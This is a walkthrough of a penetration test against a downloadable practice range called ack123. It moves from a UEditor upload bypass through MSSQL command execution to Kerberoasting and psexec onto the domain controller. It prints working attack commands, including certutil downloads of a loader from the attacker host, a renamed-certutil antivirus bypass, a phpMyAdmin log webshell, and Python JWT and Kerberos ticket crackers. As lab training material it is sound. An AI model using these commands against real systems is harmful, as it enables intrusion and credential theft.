Intranet penetration test against a defended range (ack123)

Date: 2022-01-04

1. Environment setup

This range comes from Dark Moon's (暗月) intranet penetration material. I came across this article while browsing a few days ago, https://mp.weixin.qq.com/s/VB4elHdrHNCmPDP_ktcLRg , and downloaded the range to play with it

Range download: https://pan.baidu.com/s/13g_1FFg-ZYYpBwkCvKyYWQ Extraction code: 7fkj

The topology is shown below. The final goal is to take control of all five servers

 

After downloading and extracting, there are five suspended virtual machines. Two network adapters, VMnet18 and VMnet19, have to be added manually; the settings are as follows

 

In addition, I logged in to each target, set the static IP addresses shown in the topology, and on 12server-web1 edited C:\HWS.com\HwsHostMaster\wwwroot\www.ackmoon.com\web\HdhApp.config, replacing the database IP address with the address of 12server-data1

 

Map the domain name to the IP address in C:\Windows\System32\drivers\etc\hosts on the attacker machine. Originally the web tier of the range is exposed to the internet through FRP; to keep things simple I attack it locally from the host (192.168.59.1)

 

2. External network foothold

2.1 Information gathering

Browse to www.ackmoon.com directly to begin. The home page shows the site is built on HdhCMS; a search for historical vulnerabilities turns up only one logic flaw. Looking around the site, appending admin to the domain redirects straight to the admin backend. Weak-password logins fail, so next scan the target's directories and ports

  • Port scan: ports 21, 135, 139, 445 and 999 are open. The server is Windows Server 2012 and exposes phpMyAdmin; weak passwords and brute forcing do not get in
  • Directory scan: nothing useful besides the admin directory

The backend has a registration function, so first register an account, Beiwo / [email protected] . Logging in shows some server and system information in the backend

 

2.2 UEditor 1.4.3 arbitrary file upload

UEditor 1.4.3 (the .NET version) has a known vulnerability. Appending the usual path to the URL did not find controller.ashx, so I downloaded the source and searched it globally. The final path is below; visiting it shows the vulnerable action is reachable

http://www.ackmoon.com/admin/net/controller.ashx?action=catchimage

 

Construct a malicious HTML page: a form that POSTs to the catchimage action above with a single text box, labelled "shell addr:", for the URL of the remote file to fetch

Start a web server locally and host an AV-evading ASPX webshell renamed test.jpg. In the form's box enter the shell's URL with a query string that ends in the real extension: http://192.168.59.1/test.jpg?.aspx

 

Click submit; the response returns the saved path. Prepend the site address, http://www.ackmoon.com/upfiles/image/20211210/6377476568176757142106228.aspx , and connect to the webshell successfully
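Why the `test.jpg?.aspx` trick lands an .aspx file, as an added example that is not UEditor's own code or part of the original post: a Python emulation of the name derivation in the UEditor 1.4.3 (.NET) catchimage handler next to a hardened version. It assumes the handler builds the saved name from the fetched URL with .NET's Path.GetFileName / Path.GetExtension (so the extension is whatever follows the last '.' in the whole URL, query string included) and that the random/timestamp part of the saved name can be replaced by a fixed string for the demo.

```python
"""Added example, not UEditor's own code: a Python emulation of how the
UEditor 1.4.3 (.NET) catchimage handler derives the saved file name, next to
a hardened version. Assumptions: the handler builds the name from the fetched
URL with .NET's Path.GetFileName / Path.GetExtension (so the extension is
taken from the last '.' in the whole URL, query string included), and the
random part of the real saved name is replaced here by a fixed string."""
import posixpath
from urllib.parse import urlsplit

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif", ".bmp"}
FIXED_RAND = "123456"  # stands in for the random/timestamp part of the real name


def dotnet_get_file_name(s: str) -> str:
    """Mimics .NET Path.GetFileName: everything after the last '/' or '\\'."""
    return s[max(s.rfind("/"), s.rfind("\\")) + 1:]


def dotnet_get_extension(s: str) -> str:
    """Mimics .NET Path.GetExtension: from the last '.', unless a separator
    comes after it or the '.' is the final character."""
    for i in range(len(s) - 1, -1, -1):
        if s[i] == ".":
            return s[i:] if i != len(s) - 1 else ""
        if s[i] in "/\\":
            break
    return ""


def vulnerable_saved_name(source_url: str) -> str:
    """Vulnerable behaviour: the query string leaks into the extension."""
    name = dotnet_get_file_name(source_url)      # 'test.jpg?.aspx'
    return "upfiles/image/" + FIXED_RAND + dotnet_get_extension(name)


def hardened_saved_name(source_url: str):
    """Hardened: parse the URL, keep only the path, take the extension from
    the path's basename and enforce an allow-list. None means refuse."""
    path = urlsplit(source_url).path             # query/fragment discarded
    ext = posixpath.splitext(posixpath.basename(path))[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    return "upfiles/image/" + FIXED_RAND + ext


if __name__ == "__main__":
    url = "http://192.168.59.1/test.jpg?.aspx"   # the URL used in the post
    print("vulnerable:", vulnerable_saved_name(url))
    print("hardened:  ", hardened_saved_name(url))
```

The hardened version also rejects a percent-encoded question mark (`test.jpg%3F.aspx`), because the extension is taken from the decoded-free path basename, not from the raw string. Checking the remote server's Content-Type header, as the handler does, is no defence on its own: the attacker runs that server and can return image/jpeg for any bytes.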

 

2.3 Bringing CS online with AV evasion (web1)

Basic host information gathering: two network adapters, not domain-joined. There is no permission to read the database configuration file for now; escalate privileges after going online

 

List the running processes with tasklist and check them against https://payloads.net/kill_software/ : the host runs Huweishen (护卫神) and the 360 security suite

 

Then bring the CS beacon online with an AV-evading payload

 

2.4 Privilege escalation with Rotten Potato (web1)

Right-click the host -> Erebus -> Local privilege escalation -> Potatoes (MS16-075) -> Rotten Potato; the Rotten Potato module of the Erebus plugin escalates privileges successfully

 

3. Intranet penetration

3.1 MSSQL: CS online and privilege escalation (data1)

Download the database configuration file C:\HWS.com\HwsHostMaster\wwwroot\www.ackmoon.com\web\HdhApp.config. It shows the target uses a separate database server, and the database is MSSQL

 

Use the socks proxy provided by CS: configure the proxy server and rules in Proxifier and add Navicat.exe to it. Navicat connects to the database; open a new query and call xp_cmdshell to run system commands

EXEC master..xp_cmdshell 'ipconfig';

 

(Note: xp_cmdshell is enabled by default in MSSQL 2000 and disabled by default from MSSQL 2005 onwards. With sysadmin privileges (the sa login) it can be re-enabled with sp_configure

-- These statements have not been tried in this range yet; recorded for reference
-- Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Disable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;

-- Restore / remove the xp_cmdshell extended procedure (sp_dropextendedproc takes the procedure name, not the DLL)
EXEC sp_addextendedproc 'xp_cmdshell', @dllname = 'xplog70.dll';
EXEC sp_dropextendedproc 'xp_cmdshell';

)

 

At first I wanted to use certutil to download the loader remotely, but it never succeeded; checking on the target showed Huorong (火绒) intercepting it

EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.59.1/loader.exe C:\Windows\Temp\loader.exe';

 

The solution comes from the article referenced below on bringing a host online through MSSQL:

  • Enable sp_OACreate (OLE Automation Procedures)
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE;
  • Use sp_OACreate to copy certutil.exe to C:\Windows\Temp\ under the name sethc.exe (the renamed copy gets past the interception of certutil)
DECLARE @o INT;
EXEC sp_oacreate 'scripting.filesystemobject', @o OUT;
EXEC sp_oamethod @o, 'copyfile', NULL, 'C:\Windows\System32\certutil.exe', 'C:\Windows\Temp\sethc.exe';
  • Download loader.exe with the renamed certutil
DECLARE @shell INT;
EXEC sp_oacreate 'wscript.shell', @shell OUTPUT;
EXEC sp_oamethod @shell, 'run', NULL, 'C:\Windows\Temp\sethc.exe -urlcache -split -f "http://192.168.59.1/loader.exe" C:\Windows\Temp\loader.exe';
  • Run the loader through xp_cmdshell to load the shellcode
EXEC master..xp_cmdshell 'C:\Windows\Temp\loader.exe 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';

 

data1 comes online in CS. The host computer is too laggy, so after escalating privileges on data1 with the Erebus Rotten Potato module I suspend web1 first; running all five VMs at once is too much

 

3.2 phpMyAdmin backend getshell (web2)

While gathering host information on data1 we found two network adapters, so explore the 192.168.22.0/24 segment. A port scan finds 192.168.22.135 with port 80 open; browse to it locally through the socks proxy provided by CS

 

The page says the username and password are both demo. Log in, capture the request, and find a JWT

 

Paste it into https://jwt.io/ : you can see another IP address (that segment does not come up again later) and the current user demo, but without the key the JWT cannot be forged

 

jwtcrack ran for a long time without a result, so I switched to jwt_tool with the rockyou.txt dictionary. It recovers the key qweasdzxc5; forge a token for the admin user and log in to the system
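What jwt_tool is doing in that step, as an added example that is not the post's or jwt_tool's code: an offline dictionary attack on an HS256-signed JWT, followed by forging a token once the key is known. The token is constructed here, signed with the key the post recovered (qweasdzxc5) but carrying invented claims (the `user` and `ip` values are made up); the real token's claims are not reproduced, and WORDLIST is a tiny inline stand-in for rockyou.txt.

```python
"""Added example, not the post's or jwt_tool's code: an offline dictionary
attack on an HS256-signed JWT, then forging a token once the key is known.
The token is constructed here, signed with the key the post recovered
(qweasdzxc5) and carrying invented claims; the real token's claims are not
reproduced. WORDLIST is a tiny inline stand-in for rockyou.txt."""
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict, key: str) -> str:
    """Build header.payload.signature with HMAC-SHA256 over the first two parts."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}".encode()
    return f"{header}.{body}." + b64url(hmac.new(key.encode(), signing_input, hashlib.sha256).digest())


def payload_of(token: str) -> dict:
    """Decode the claims without verifying anything (what jwt.io shows)."""
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, wordlist):
    """Return the first candidate that reproduces the signature, or None.
    Each guess costs one HMAC, which is why a short symmetric key falls to a wordlist."""
    header, body, sig = token.split(".")
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        raise ValueError("not an HS256 token")
    signing_input = f"{header}.{body}".encode()
    target = b64url_decode(sig)
    for word in wordlist:
        guess = hmac.new(word.encode(), signing_input, hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return word
    return None


def forge_admin(token: str, key: str) -> str:
    """Re-sign the existing claims with the recovered key, switching user to admin."""
    claims = payload_of(token)
    claims["user"] = "admin"
    return sign_hs256(claims, key)


# Constructed sample input: invented claims, signed with the key from the post
DEMO_TOKEN = sign_hs256({"user": "demo", "ip": "192.0.2.10"}, "qweasdzxc5")
WORDLIST = ["123456", "password", "qwerty", "qweasdzxc5", "letmein"]

if __name__ == "__main__":
    key = crack_hs256(DEMO_TOKEN, WORDLIST)
    print("recovered key:", key)
    print("forged claims:", payload_of(forge_admin(DEMO_TOKEN, key)))
```

The `alg` check matters in practice: a cracker should refuse to "recover" a key for an RS256 token, and a server should never let the token choose its own algorithm.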

 

I'm not sure whether I did something wrong, but the forged token never worked for me. Looking at the public write-up, the actual clue is in the response headers: the server looks like phpStudy V8.1, whose phpMyAdmin is at URL/phpmyadmin4.8.5

Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02

 

The phpMyAdmin password is then root / qweasdzxc5 (not very logical, but anything can happen in a real engagement)

 

The usual phpMyAdmin getshell through the general query log

# Turn on the general log
set global general_log = 'on';
# Point the log file at the web root
set global general_log_file = 'C:\\phpstudy_pro\\WWW\\shell.php';
# Every query is now written to shell.php, so select a one-line PHP webshell as a string (the PHP one-liner goes inside the quotes)
select '';

 

Connect to the shell with AntSword. Basic information gathering shows the server runs no AV, we are already SYSTEM, and it is domain-joined: the domain controller is at 10.10.10.135, the domain is ack123.com, and the domain administrator account is administrator

 

3.3 Bringing a host with no outbound access online in CS (web2)

Create a CS listener with the Beacon TCP payload, generate a stageless beacon, upload it to web2 and run it. On the pivot beacon execute connect 192.168.22.135 2333: web2 comes online through a forward connection, but the session is unstable and keeps dropping and reconnecting. Relaying the traffic out with goproxy instead turns out to be very stable

Upload proxy.exe to data1. First start an HTTP proxy on port 8080 on this host with outbound access, then use the built-in netsh to forward port 8888 on its 192.168.22.x interface (the segment with no outbound access) to port 8080 on its 192.168.59.x interface; that forwarded port is used as the HTTP proxy in the CS listener. Tool download: https://github.com/snail007/goproxy/releases/tag/v11.3

proxy.exe http -t tcp -p "0.0.0.0:8080" --daemon
netsh interface portproxy add v4tov4 listenaddress=192.168.22.133 listenport=8888 connectaddress=192.168.59.135 connectport=8080

 

Create a listener with proxy settings attached, filling in the intranet segment address as the HTTP proxy

 

The computer is too laggy. Then generate the CS payload; after running it on web2, it comes online successfully

 

After getting a machine in the domain, first dump credentials with mimikatz and hashdump. Only the local administrator's hash comes out; I wanted to crack it, but cmd5 wanted payment and other sites had no match. Try other approaches first

 

3.4 SPN scanning (web2)

List the SPNs registered in ack123.com and find a service SPN

setspn -T ack123.com -q */*

 

Request a service ticket with mimikatz. The ticket is encrypted with RC4, that is, with the service account's NTLM hash, so the password of the account behind the service can be recovered by brute-forcing the ticket offline

mimikatz kerberos::ask /target:mysql/16server-dc1.ack123.com

 

View and export the tickets

mimikatz kerberos::list          # view
mimikatz kerberos::list /export  # export

 

pwd shows the current directory; download the exported ticket back

 

The domain admin password is [email protected] !, tool: https://github.com/nidem/kerberoast . This password is not in my usual dictionary; after checking the write-up I found it in one of Kali's wordlists

python3 tgsrepcrack.py /usr/share/wordlists/fasttrack.txt [email protected]~16server-dc1.ack123.com-ACK123.COM.kirbi
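Why the RC4 ticket in 3.4 can be cracked offline and what tgsrepcrack.py is checking for each guess, as an added example that is not the post's or kerberoast's code: an end-to-end Kerberos RC4-HMAC (etype 23) encrypt, decrypt and dictionary attack in pure Python. RC4-HMAC keys are the service account's NT hash, MD4(UTF-16LE(password)), and the ticket's enc-part carries an HMAC-MD5 checksum keyed from that hash, so each wordlist guess is verified without talking to the DC. MD4 is implemented here because hashlib's md4 is often unavailable. The sample enc-part is constructed below with an invented service-account password; nothing from the post's real ticket is reproduced.

```python
"""Added example, not the post's or kerberoast's code: Kerberos RC4-HMAC
(RFC 4757) encrypt/decrypt and an offline dictionary attack, which is what
tgsrepcrack.py does with the exported .kirbi. SAMPLE_PASSWORD and the ticket
bytes are invented for the demo; MD4 is implemented locally."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
TICKET_USAGE = 2  # key usage for the ticket enc-part in a KDC (TGS) reply


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (the NT hash is MD4 over the UTF-16LE password)."""
    def rot(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i in range(16):
                a = rot((a + fn(b, c, d) + x[order[i]] + k) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: K1 = HMAC(K, usage), checksum = HMAC(K1, confounder||data),
    K3 = HMAC(K1, checksum); output checksum || RC4(K3, confounder||data)."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Return the plaintext (confounder stripped), or None if the checksum fails.
    The checksum is the oracle that lets a wrong password be rejected offline."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
    checksum, body = edata[:16], edata[16:]
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, body)
    if not hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        return None
    return data[8:]


def crack_tgs(enc_part: bytes, wordlist):
    """Kerberoast core loop: NT-hash each word and try to open the ticket."""
    for word in wordlist:
        if rc4_hmac_decrypt(nt_hash(word), TICKET_USAGE, enc_part) is not None:
            return word
    return None


# Constructed sample: an invented service-account password protecting a stand-in enc-part
SAMPLE_PASSWORD = "Autumn2021!"
SAMPLE_ENC_PART = rc4_hmac_encrypt(nt_hash(SAMPLE_PASSWORD), TICKET_USAGE,
                                   b"EncTicketPart placeholder", b"\x01" * 8)
WORDLIST = ["Password1", "Summer2021!", "Autumn2021!", "Winter2021!"]

if __name__ == "__main__":
    print("cracked service password:", crack_tgs(SAMPLE_ENC_PART, WORDLIST))
```

The attack only works against etype 23 tickets, which is why Kerberoasting tools request RC4 explicitly; accounts with AES-only keys (and long, random service-account passwords) take this option away from the attacker.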

 

3.5 Pass-the-hash (DC1)

With the domain admin account and password, try psexec for lateral movement. Create a new listener with the Beacon SMB payload, probe for live hosts, then right-click -> Jump -> psexec64 and enter the credentials obtained earlier

 

The domain controller comes online! (data2 is the same as DC1 and can be brought online the same way; with memory running short I did not repeat the operation a second time.)

 

4. Summary

I learned new things from this range. The CS PIDs differ before and after because the computer was restarted partway through and the sessions were not resumed, and I did not think the earlier way of going online was elegant enough, so after learning something new I brought the hosts online again; all the tinkering was for the sake of learning

 

 

References:

https://www.cnblogs.com/sup3rman/archive/2020/06/09/13071382.html

https://www.jianshu.com/p/9d5e8236647e

https://www.modb.pro/db/66128

https://xz.aliyun.com/t/9265

https://blog.csdn.net/weixin_43970718/article/details/121068969

https://my.oschina.net/xxxasec/blog/5176721